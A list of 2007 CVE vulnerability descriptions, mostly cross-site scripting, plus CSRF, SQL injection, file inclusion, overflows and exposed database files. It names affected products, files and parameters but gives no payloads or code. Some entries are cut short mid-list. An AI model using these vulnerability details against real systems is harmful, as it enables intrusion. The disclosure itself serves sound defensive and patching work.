[CVE-2007-3821] Cross-site request forgery (CSRF) vulnerability in Webcit before 7.11 allows remote attackers to modify configurations and perform other actions as arbitrary users via unspecified vectors.
[CVE-2007-3817] Cross-site scripting (XSS) vulnerability in the LoginToboggan module 4.7.x-1.0, 4.7.x-1.x-dev, and 5.x-1.x-dev before 20070712 for Drupal, when configured to display a "Log out" link, allows remote attackers to inject arbitrary web script or HTML via a crafted username. NOTE: Drupal sanitizes the username by removing certain characters, so this might not be a vulnerability on default installations.
[CVE-2007-3807] Multiple cross-site scripting (XSS) vulnerabilities in SiteScape Forum before 7.3 allow remote attackers to inject arbitrary web script or HTML via the user name field in the login procedure, and other unspecified vectors.
[CVE-2007-3796] The password reset feature in the Spam Quarantine HTTP interface for MailMarshal SMTP 6.2.0.x before 6.2.1 allows remote attackers to modify arbitrary account information via a UserId variable with a large amount of trailing whitespace followed by a malicious value, which triggers SQL buffer truncation due to length inconsistencies between variables.
[CVE-2007-3784] Cross-site scripting (XSS) vulnerability in the Belkin G Plus Router F5D7231-4 with firmware 4.05.03 allows remote attackers to inject arbitrary web script or HTML via a hostname of a DHCP client.
[CVE-2007-3774] Dvbbs 7.1.0 SP1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for Data/Dvbbs7.mdb.
[CVE-2007-3761] Cross-site scripting (XSS) vulnerability in Safari in Apple iPhone 1.1.1 allows remote attackers to inject arbitrary web script or HTML by causing Javascript events to be applied to a frame in another domain.
[CVE-2007-3760] Cross-site scripting (XSS) vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to inject arbitrary web script or HTML via frame tags.
[CVE-2007-3758] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and in Mac OS X 10.4 through 10.4.10, allows remote attackers to set Javascript window properties for web pages that are in a different domain, which can be leveraged to conduct cross-site scripting (XSS) attacks.
[CVE-2007-3756] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to obtain sensitive information via a crafted web page that identifies the URL of the parent window, even when the parent window is in a different domain.
[CVE-2007-3747] The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 does not restrict object instantiation and manipulation to valid heap addresses, which allows remote attackers to execute arbitrary code via a crafted applet.
[CVE-2007-3746] The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 does not properly check the bounds of heap read and write operations, which allows remote attackers to execute arbitrary code via a crafted applet.
[CVE-2007-3745] The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 contains an unsafe interface that is exposed by JDirect, which allows remote attackers to free arbitrary memory and thereby execute arbitrary code.
[CVE-2007-3742] WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, does not properly handle the interaction between International Domain Name (IDN) support and Unicode fonts, which allows remote attackers to create a URL containing "look-alike characters" (homographs) and possibly perform phishing attacks.
[CVE-2007-3736] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.5 allows remote attackers to inject arbitrary web script "into another site's context" via a "timing issue" involving the (1) addEventListener or (2) setTimeout function, probably by setting events that activate after the context has changed.
[CVE-2007-3727] Multiple unspecified vulnerabilities in Webmatic before 2.7 have unknown impact and attack vectors, related to the "administration area."
[CVE-2007-3715] Sun Java System Application Server and Web Server 7.0 through 9.0 before 20070710 do not properly process XSLT stylesheets in XSLT transforms in XML signatures, which allows context-dependent attackers to execute an arbitrary Java method via a crafted stylesheet, a related issue to CVE-2007-3716.
[CVE-2007-3712] Multiple cross-site scripting (XSS) vulnerabilities in HiddenChest "is ve Bayi Basvuru Formu" (Yb ve Bayi Babvuru Formu) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown.
[CVE-2007-3708] Cross-site scripting (XSS) vulnerability in CodeIgniter 1.5.3 before 20070626 allows remote attackers to inject arbitrary web script or HTML via (1) String.fromCharCode and (2) malformed nested tag manipulations in an unspecified component, related to insufficient sanitization by the xss_clean function.
[CVE-2007-3694] Cross-site scripting (XSS) vulnerability in login.php in Miro Project Broadcast Machine 0.9.9.9 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2007-3693] Cross-site scripting (XSS) vulnerability in Gobi as of 20070711, built on Helma, allows remote attackers to inject arbitrary web script or HTML via the q parameter to the search function.
[CVE-2007-3685] Cross-site scripting (XSS) vulnerability in rpc.php in Unobtrusive Ajax Star Rating Bar before 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2007-3675] Multiple format string vulnerabilities in the kavwebscan.CKAVWebScan ActiveX control (kavwebscan.dll) in Kaspersky Online Scanner before 5.0.98 allow remote attackers to execute arbitrary code via format string specifiers in "various string formatting functions," which trigger heap-based buffer overflows.
[CVE-2007-3672] Cross-site scripting (XSS) vulnerability in ecrire/tools.php in DotClear 1.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified form fields on the blogroll page.
[CVE-2007-3655] Stack-based buffer overflow in javaws.exe in Sun Java Web Start in JRE 5.0 Update 11 and earlier, and 6.0 Update 1 and earlier, allows remote attackers to execute arbitrary code via a long codebase attribute in a JNLP file.
[CVE-2007-3653] Multiple cross-site scripting (XSS) vulnerabilities in Farsi Script (aka FaScript) FaName 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) key or (2) desc parameter to index.php, or (3) the name parameter to page.php.
[CVE-2007-3650] myWebland myBloggie 2.1.6 allows remote attackers to obtain sensitive information via (1) an invalid year parameter to calendar.php, reached through index.php
[CVE-2007-3648] SQL injection vulnerability in Webmatic before 2.6.2, and possibly other versions before 2.7, allows remote attackers to execute arbitrary SQL commands via unspecified vectors, possibly related to admin/admin_album.php and admin/admin_downloads.php. NOTE: some of these details are obtained from third party information.
[CVE-2007-3639] WordPress before 2.2.2 allows remote attackers to redirect visitors to other websites and potentially obtain sensitive information via (1) the _wp_http_referer parameter to wp-pass.php, related to the wp_get_referer function in wp-includes/functions.php
[CVE-2007-3623] Cross-site scripting (XSS) vulnerability in the Hitachi JP1/HiCommand Device Manager, Tiered Storage Manager, Replication Monitor, and GlobalLink Availability Manager before 20070528 allows remote attackers to inject arbitrary web script or HTML via the Expect HTTP header.
[CVE-2007-3615] Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache.
[CVE-2007-3614] Multiple stack-based buffer overflows in waHTTP.exe (aka the SAP DB Web Server) in SAP DB, possibly 7.3 through 7.5, allow remote attackers to execute arbitrary code via (1) a certain cookie value
[CVE-2007-3613] Cross-site scripting (XSS) vulnerability in ADM:GETLOGFILE in SAP Internet Graphics Service (IGS) allows remote attackers to inject arbitrary web script or HTML via the PARAMS parameter.
[CVE-2007-3602] The SOAP webservice in vtiger CRM before 5.0.3 does not ensure that authenticated accounts are active, which allows remote authenticated users with inactive accounts to access and modify data, as demonstrated by the Thunderbird plugin.
[CVE-2007-3597] Session fixation vulnerability in Zen Cart 1.3.7 and earlier allows remote attackers to hijack web sessions by setting the Cookie parameter.
[CVE-2007-3594] Multiple cross-site scripting (XSS) vulnerabilities in AdventNet ManageEngine OpManager 6 and 7 allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter in (a) ping.do and (b) traceRoute.do in map/
[CVE-2007-3593] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine NetFlow Analyzer 5 allow remote attackers to inject arbitrary web script or HTML via the (1) alpha parameter in (a) netflow/jspui/applicationList.jsp, the (2) task parameter in (b) netflow/jspui/appConfig.jsp, the (3) view parameter in (c) netflow/jspui/index.jsp, and the (4) rtype parameter in (d) netflow/jspui/selectDevice.jsp and (e) netflow/jspui/customReport.jsp. NOTE: it was later reported that vector 3 also affects 7.5 build 7500.
[CVE-2007-3590] Cross-site scripting (XSS) vulnerability in visitenkarte.php in b1gBB 2.24.0 allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2007-3580] PHPIDS does not properly handle certain code containing newlines, as demonstrated by a try/catch block within a loop, which allows user-assisted remote attackers to inject arbitrary web script.
[CVE-2007-3579] PHPIDS before 20070703 does not properly handle setting the .text property of a SCRIPT element before its attachment to the DOM, which allows remote attackers to inject arbitrary web script.
[CVE-2007-3578] PHPIDS before 20070703 does not properly handle (1) arithmetic expressions and (2) unclosed comments, which allows remote attackers to inject arbitrary web script.
[CVE-2007-3576] ** DISPUTED ** Microsoft Internet Explorer 6 executes web script from URIs of arbitrary scheme names ending with the "script" character sequence, using the (1) vbscript: handler for scheme names with 7 through 9 characters, and the (2) javascript: handler for scheme names with 10 or more characters, which might allow remote attackers to bypass certain XSS protection schemes. NOTE: other researchers dispute the significance of this issue, stating "this only works when typed in the address bar."
[CVE-2007-3574] Multiple cross-site scripting (XSS) vulnerabilities in setup.cgi on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.00.06 firmware allow remote attackers to inject arbitrary web script or HTML via the (1) c4_trap_ip_, (2) devname, (3) snmp_getcomm, or (4) snmp_setcomm parameter.
[CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
[CVE-2007-3569] Multiple cross-site scripting (XSS) vulnerabilities in Oliver Library Management System allow remote attackers to inject arbitrary web script or HTML via the (1) updateform and (2) displayform parameter to (a) gateway/gateway.exe
[CVE-2007-3561] Cross-site scripting (XSS) vulnerability in ara.asp in Efendy Blog 1.0 allows remote attackers to inject arbitrary web script or HTML via the ara parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-3559] Cross-site scripting (XSS) vulnerability in infusions/shoutbox_panel/shoutbox_panel.php in PHP-Fusion 6.01.10 and 6.01.9, when guest posts are enabled, allows remote authenticated users to inject arbitrary web script or HTML via the URI, related to the FUSION_QUERY constant.
[CVE-2007-3556] Liesbeth base CMS stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an include file containing account credentials via a direct request for config.inc.
[CVE-2007-3555] Cross-site scripting (XSS) vulnerability in index.php in Moodle 1.7.1 allows remote attackers to inject arbitrary web script or HTML via a style expression in the search parameter, a different vulnerability than CVE-2004-1424.
[CVE-2007-3553] Cross-site scripting (XSS) vulnerability in Rapid Install Web Server in Oracle Application Server 11i allows remote attackers to inject arbitrary web script or HTML via a URL to the "Secondary Login Page", as demonstrated using (1) pls/ and (2) pls/MSBEP004/. NOTE: the provenance of this information is unknown.
[CVE-2007-3550] ** DISPUTED ** Microsoft Internet Explorer 6.0 and 7.0 allows remote attackers to fill Zones with arbitrary domains using certain metacharacters such as wildcards via JavaScript, which results in a denial of service (website suppression and resource consumption), aka "Internet Explorer Zone Domain Specification Dos and Page Suppressing". NOTE: this issue has been disputed by a third party, who states that the zone settings cannot be manipulated.
[CVE-2007-3546] Cross-site scripting (XSS) vulnerability in the Windows GUI in Nessus Vulnerability Scanner before 3.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3542] Cross-site scripting (XSS) vulnerability in admin/auth.php in Pluxml 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2007-3541] Cross-site scripting (XSS) vulnerability in Kurinton sHTTPd 20070408 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3540] Multiple cross-site scripting (XSS) vulnerabilities in search.asp in rwAuction Pro 5.0 allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) show, (3) searchtype, (4) catid, and (5) searchtxt parameters, a different version and vectors than CVE-2005-4060.
[CVE-2007-3534] SQL injection vulnerability in login.php in WebChat 0.78 allows remote attackers to execute arbitrary SQL commands via the rid parameter.
[CVE-2007-3525] Ripe Website Manager 0.8.9 and earlier allows remote attackers to obtain configuration information via a direct request to includes/phpinfo.php, which calls the phpinfo function. NOTE: the provenance of this information is unknown.
[CVE-2007-3524] Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the level parameter to (1) admin/includes/author_panel_header.php or (2) admin/includes/admin_header.php.
[CVE-2007-3517] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.8.3 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF) to (1) index.php, (2) demo/claroline170/index.php, and possibly other scripts.
[CVE-2007-3516] Multiple cross-site scripting (XSS) vulnerabilities in kayit.asp in Gorki Online Santrac Sitesi allow remote attackers to inject arbitrary web script or HTML via the (1) kullanici, (2) posta, or (3) takim_adi parameter to uyeler.asp. NOTE: the provenance of this information is unknown.
[CVE-2007-3504] Directory traversal vulnerability in the PersistenceService in Sun Java Web Start in JDK and JRE 5.0 Update 11 and earlier, and Java Web Start in SDK and JRE 1.4.2_13 and earlier, for Windows allows remote attackers to perform unauthorized actions via an application that grants file overwrite privileges to itself. NOTE: this can be leveraged to execute arbitrary code by overwriting a .java.policy file.
[CVE-2007-3503] The Javadoc tool in Sun JDK 6 and JDK 5.0 Update 11 can generate HTML documentation pages that contain cross-site scripting (XSS) vulnerabilities, which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3502] Unspecified vulnerability in the web-based product configuration system in Kaspersky Anti-Spam before 3.0 MP1 allows remote attackers to obtain access to certain directories.
[CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
[CVE-2007-3500] Xeweb XEForum allows remote attackers to gain privileges via a modified xeforum cookie.
[CVE-2007-3498] Cross-site scripting (XSS) vulnerability in smoketests/configForm.php in HTML Purifier before 2.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "unescaped print_r output."
[CVE-2007-3496] Cross-site scripting (XSS) vulnerability in SAP Web Dynpro Java (BC-WD-JAV) in SAP NetWeaver Nw04 SP15 through SP19 and Nw04s SP7 through SP11, aka SAP Java Technology Services 640 before SP20 and SAP Web Dynpro Runtime Core Components 700 before SP12, allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2007-3495] Multiple cross-site scripting (XSS) vulnerabilities in the SAP Internet Communication Framework (BC-MID-ICF) in the SAP Basis component 700 before SP12, and 640 before SP20, allow remote attackers to inject arbitrary web script or HTML via certain parameters associated with the default login error page.
[CVE-2007-3489] Cross-site request forgery (CSRF) vulnerability in pop/WizU.html in the management interface in Check Point VPN-1 Edge X Embedded NGX 7.0.33x on the Check Point VPN-1 UTM Edge allows remote attackers to perform privileged actions as administrators, as demonstrated by a request with the swuuser and swupass parameters, which adds an administrator account. NOTE: the CSRF attack has no timing window because there is no logout capability in the management interface.
[CVE-2007-3486] Cross-site scripting (XSS) vulnerability in AltaVista search engine allows remote attackers to inject arbitrary web script or HTML via the text parameter to the default URI.
[CVE-2007-3485] Multiple cross-site scripting (XSS) vulnerabilities in Yandex.Server allow remote attackers to inject arbitrary web script or HTML via the (1) query or (2) within parameter to the default URI.
[CVE-2007-3484] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in search.php in Google Custom Search Engine allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: this issue is disputed by the Google Security Team, who states that "Google does not provide the 'search.php' script referenced. When a user creates a custom search engine, we provide them with a block of javascript to include on their site. Some users write additional code around this block of javascript to further customize their website."
[CVE-2007-3460] Multiple PHP remote file inclusion vulnerabilities in index.php3 in EVA-Web 1.1 through 2.2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) aide or (2) perso parameter.
[CVE-2007-3448] Cross-site scripting (XSS) vulnerability in index.php in BugMall Shopping Cart 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the msgs parameter. NOTE: 4.0.2 and other versions might also be affected.
[CVE-2007-3440] The Snom 320 SIP Phone, running snom320 linux 3.25, snom320-SIP 6.2.3, and snom320 jffs23.36, allows remote attackers to place calls to arbitrary phone numbers via certain requests to the web server on port 1800.
[CVE-2007-3439] The Snom 320 SIP Phone, running snom320 linux 3.25, snom320-SIP 6.2.3, and snom320 jffs23.36, allows remote attackers to read a list of missed calls, received calls, and dialed numbers via a direct request to the web server on port 1800.
[CVE-2007-3426] Cross-site scripting (XSS) vulnerability in index.php in phpTrafficA 1.4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2007-3424] The moveim function in cgi-bin/cgi-lib/instantmessage.pl in web-app.org WebAPP before 0.9.9.7 uses the tocat parameter as a subdirectory name when moving an instant message, which has unknown impact and remote attack vectors.
[CVE-2007-3423] cgi-bin/cgi-lib/instantmessage.pl in web-app.org WebAPP before 0.9.9.7 uses the From field of an instant message as the beginning of the .dat file name when the (1) imview2 or (2) imview3 function reads (a) an internal IM, or a message from a (b) guest or (c) removed member, which has unknown impact and remote attack vectors.
[CVE-2007-3422] The getcgi function in cgi-bin/cgi-lib/subs.pl in web-app.org WebAPP before 0.9.9.7 attempts to parse query strings that contain (1) non-printing characters, (2) certain printing characters that do not commonly occur in URLs, or (3) invalid URL encoding sequences, which has unknown impact and remote attack vectors.
[CVE-2007-3421] The (1) login, (2) admin profile edit, (3) reminder, (4) edit profile, (5) profile view, (6) gallery view, (7) gallery comment, and (8) gallery feedback capabilities in web-app.org WebAPP before 0.9.9.7 do not verify presence of users in memberlist.dat, which has unknown impact and remote attack vectors.
[CVE-2007-3420] The Random Cookie Password functionality in the loaduser function in cgi-bin/cgi-lib/subs.pl in web-app.org WebAPP before 0.9.9.7 does not clear the (1) username, (2) password, (3) usertheme, and (4) userlang cookies for unauthorized users, which has unknown impact and remote attack vectors.
[CVE-2007-3419] The editprofile3 function in cgi-bin/cgi-lib/user.pl in web-app.org WebAPP before 0.9.9.7 does not properly check the (1) themes.dat, (2) languages.dat, (3) profession.dat, (4) gen.dat, (5) marstat.dat, (6) states.dat, and (7) ages.dat files before saving profile settings of members, which has unknown impact and remote attack vectors.
[CVE-2007-3418] The displaypost function in cgi-bin/cgi-lib/forum_display.pl in web-app.org WebAPP before 0.9.9.7 does not display usernames in conjunction with real names, which makes it easier for remote authenticated users to impersonate other users.
[CVE-2007-3417] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/cgi-lib/search.pl in web-app.org WebAPP before 0.9.9.7 allow remote attackers to inject arbitrary web script or HTML via a search string, which is not sanitized when an HREF attribute is printed by the (1) process_search or (2) show_recent_searches function.
[CVE-2007-3416] Multiple cross-site request forgery (CSRF) vulnerabilities in the administration of (1) polls, (2) profiles, (3) IP bans, and (4) forums in (a) web-app.org WebAPP 0.8 through 0.9.9.6
[CVE-2007-3414] Multiple cross-site scripting (XSS) vulnerabilities in access2asp 4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) od and (2) search parameters to (a) suppliersList.asp and (b) contactsList.asp.
[CVE-2007-3413] Multiple cross-site scripting (XSS) vulnerabilities in bosDataGrid 2.50 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) GridSearch, (2) gsearch, or (3) ParentID parameter to an unspecified component.
[CVE-2007-3412] Cross-site scripting (XSS) vulnerability in edit_image.asp in ClickGallery Server 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the from parameter.
[CVE-2007-3405] Multiple cross-site scripting (XSS) vulnerabilities in defter_yaz.asp in Lebisoft zdefter 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) ad and (2) konu parameters. NOTE: the provenance of this information is unknown.
[CVE-2007-3398] LiteWEB 2.7 allows remote attackers to cause a denial of service (hang) via a large number of requests for nonexistent pages.
[CVE-2007-3397] The web container in IBM WebSphere Application Server (WAS) before 6.0.2.21, and 6.1.x before 6.1.0.9, sends response data intended for a different request in certain circumstances after a closed connection error, which might allow remote attackers to obtain sensitive information.
[CVE-2007-3396] Cross-site scripting (XSS) vulnerability in index.wkf in KeyFocus (KF) web server 3.1.0 allows remote attackers to inject arbitrary web script or HTML via the opsubmenu parameter.
[CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
[CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
[CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
[CVE-2007-3366] Cross-site scripting (XSS) vulnerability in Simple CGI Wrapper (scgiwrap) in cPanel before 10.9.1, and 11.x before 11.4.19-R14378, allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: the provenance of this information is unknown.
[CVE-2007-3364] Cross-site scripting (XSS) vulnerability in the cgi-bin/post.mscgi sample page in MyServer 0.8.9 allows remote attackers to inject arbitrary web script or HTML via the body content.
[CVE-2007-3359] Multiple PHP remote file inclusion vulnerabilities in SerWeb 0.9.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter to (1) html/load_apu.php or (2) html/mail_prepend.php. NOTE: the provenance of this information is unknown.
[CVE-2007-3358] PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter.
[CVE-2007-3355] Multiple cross-site scripting (XSS) vulnerabilities in NetClassifieds Premium Edition allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3352] Cross-site scripting (XSS) vulnerability in the preview form in Stephen Ostermiller Contact Form before 2.00.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that contain an apostrophe.
[CVE-2007-3344] Multiple cross-site scripting (XSS) vulnerabilities in netjukebox 4.01b allow remote attackers to inject arbitrary web script or HTML via the (1) album_id, (2) order, (3) sort, (4) filter, and (5) genre_id parameters to (a) index.php
[CVE-2007-3343] Cross-site scripting (XSS) vulnerability in RaidenHTTPD before 2.0.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3342] Multiple cross-site scripting (XSS) vulnerabilities in Movable Type (MT) before 3.34 allow remote attackers to inject arbitrary web script or HTML via comments that have (1) a malformed SGML numeric character reference with a '\0' (0x00) character in a javascript: URI or (2) an attribute in an element that lacks the '>' character at the end of the start tag, a different vulnerability than CVE-2007-0231.
[CVE-2007-3339] Multiple cross-site scripting (XSS) vulnerabilities in forum/include/error/autherror.cfm in FuseTalk Basic, Standard, Enterprise, and ColdFusion allow remote attackers to inject arbitrary web script or HTML via the (1) FTVAR_LINKP and (2) FTVAR_URLP parameters to (a) forum/include/error/autherror.cfm, and the (3) FTVAR_SCRIPTRUN parameter to (b) forum/include/common/comfinish.cfm and (c) blog/include/common/comfinish.cfm.
[CVE-2007-3330] Cross-site scripting (XSS) vulnerability in STphp EasyNews PRO 4.0 allows remote attackers to inject arbitrary web script or HTML via a news post, which is stored in news/ without sanitization.
[CVE-2007-3328] Multiple cross-site scripting (XSS) vulnerabilities in Interact 2.4 beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) module_key parameter to (a) kb/kb.php, (b) quiz/runquiz.php, (c) quiz/quiz.php, (d) forum/forum.php, (e) forum/byname.php, and (f) journal/journalview.php in modules/, and unspecified other scripts
[CVE-2007-3324] Multiple cross-site scripting (XSS) vulnerabilities in Comersus Cart 7.07 allow remote attackers to inject arbitrary web script or HTML via the redirectUrl parameter to (1) comersus_customerAuthenticateForm.asp or (2) comersus_message.asp, different vectors than CVE-2004-0681.
[CVE-2007-3310] Cross-site scripting (XSS) vulnerability in arama.asp in TDizin allows remote attackers to inject arbitrary web script or HTML via the ara parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-3299] Cross-site scripting (XSS) vulnerability in AWFFull before 3.7.4, when AllSearchStr (aka the All Search Terms report) is enabled, allows remote attackers to inject arbitrary web script or HTML via a search string.
[CVE-2007-3296] The ThunderServer.webThunder.1 ActiveX control in xunlei Web Thunderbolt 1.7.3.109 allows remote attackers to download arbitrary files and conduct other unauthorized actions by invoking dangerous methods.
[CVE-2007-3291] Cross-site scripting (XSS) vulnerability in LiveCMS 3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via an article name, possibly involving the titulo parameter in article.php.
[CVE-2007-3288] Cross-site scripting (XSS) vulnerability in the skeltoac stats (Automattic Stats) 1.0 plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer field.
[CVE-2007-3281] Cross-site scripting (XSS) vulnerability in index.php in Php Hosting Biller 1.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2007-3276] Cross-site scripting (XSS) vulnerability in index.php in Site@School (S@S) 2.4.10 allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-3269] Multiple cross-site scripting (XSS) vulnerabilities in Papoo Light 3.6 before 20070611 allow remote attackers to inject arbitrary web script or HTML via (1) the URI in a GET request or (2) the Title field of a visitor comment, and (3) allow remote authenticated users to inject arbitrary web script or HTML via a message to another user. NOTE: vector (2) might overlap CVE-2006-3571.1.
[CVE-2007-3267] Cross-site scripting (XSS) vulnerability in low.php in Fuzzylime Forum 1.01b and earlier allows remote attackers to inject arbitrary web script or HTML via the fromaction parameter in a log action, a different vector than CVE-2007-3235.
[CVE-2007-3266] Directory traversal vulnerability in webif.cgi in ifnet WEBIF allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the outconfig parameter.
[CVE-2007-3265] Cross-site scripting (XSS) vulnerability in the Samples component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3264] Unspecified vulnerability in the PD tools component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier has unknown impact and attack vectors.
[CVE-2007-3262] Unspecified vulnerability in the Default Messaging Component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier allows remote attackers to cause a denial of service related to a thread hang, and possibly related to a "TCP issue," or to MPAlarmThread and a resultant memory leak.
[CVE-2007-3261] Cross-site scripting (XSS) vulnerability in widgets/widget_search.php in dKret before 2.6 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF).
[CVE-2007-3256] Xythos Enterprise Document Manager (XEDM), Digital Locker (XDL), and possibly WebFile Server before 6.0.46.1 allow remote authenticated users to associate arbitrary Content-Type HTTP headers with documents, which might facilitate malware distribution.
[CVE-2007-3255] Multiple cross-site request forgery (CSRF) vulnerabilities in Xythos Enterprise Document Manager (XEDM) before 5.0.25.8, and 6.x before 6.0.46.1, allow remote authenticated users to execute commands as arbitrary users via (1) a saved Workflow name or (2) the Content-Type HTTP header. NOTE: item 2 also affects the same version numbers of Xythos Digital Locker (XDL). One or both vectors might also affect Xythos WebFile Server.
[CVE-2007-3254] Multiple cross-site scripting (XSS) vulnerabilities in Xythos Enterprise Document Manager (XEDM) before 5.0.25.8, and 6.x before 6.0.46.1, allow remote authenticated users to inject arbitrary web script or HTML via (1) a saved Workflow name
[CVE-2007-3252] PortalApp stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for 8691.mdb, a different vector than CVE-2004-1786.
[CVE-2007-3249] Cross-site scripting (XSS) vulnerability in mod_lettermansubscribe.php in the Letterman Subscriber (mod_letterman) before 1.2.5 module for Joomla! allows remote attackers to inject arbitrary web script or HTML via the Itemid parameter.
[CVE-2007-3248] Unspecified vulnerability in Sun Solaris 10 before 20070614, when IPv6 interfaces are present but not configured for IPsec, allows remote attackers to cause a denial of service (system crash) via certain network traffic.
[CVE-2007-3243] Cross-site scripting (XSS) vulnerability in bb-login.php in bbPress 0.8.1 allows remote attackers to inject arbitrary web script or HTML via the re parameter. NOTE: exploitation may require forcing the client to send a certain Referer header.
[CVE-2007-3242] The Menu Manager Mod for (1) web-app.net WebAPP (aka WebAPP NE) 0.9.9.3.3 through 0.9.9.8, and (2) web-app.org WebAPP before 0.9.9.6, allows remote authenticated users to execute arbitrary commands via shell metacharacters in the titles of items in a personal menu.
[CVE-2007-3241] Cross-site scripting (XSS) vulnerability in blogroll.php in the cordobo-green-park theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF portion of a URI.
[CVE-2007-3240] Cross-site scripting (XSS) vulnerability in 404.php in the Vistered-Little theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the URI (REQUEST_URI) that accesses index.php. NOTE: this can be leveraged for PHP code execution in an administrative session.
[CVE-2007-3239] Cross-site scripting (XSS) vulnerability in searchform.php in the AndyBlue theme before 20070607 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF portion of a URI to index.php. NOTE: this can be leveraged for PHP code execution in an administrative session.
[CVE-2007-3238] Cross-site scripting (XSS) vulnerability in functions.php in the default theme in WordPress 2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via the PATH_INFO (REQUEST_URI) to wp-admin/themes.php, a different vulnerability than CVE-2007-1622. NOTE: this might not cross privilege boundaries in some configurations, since the Administrator role has the unfiltered_html capability.
[CVE-2007-3235] Cross-site scripting (XSS) vulnerability in low.php in Fuzzylime Forum 1.0 allows remote attackers to inject arbitrary web script or HTML via the topic parameter. NOTE: this might be resultant from SQL injection.
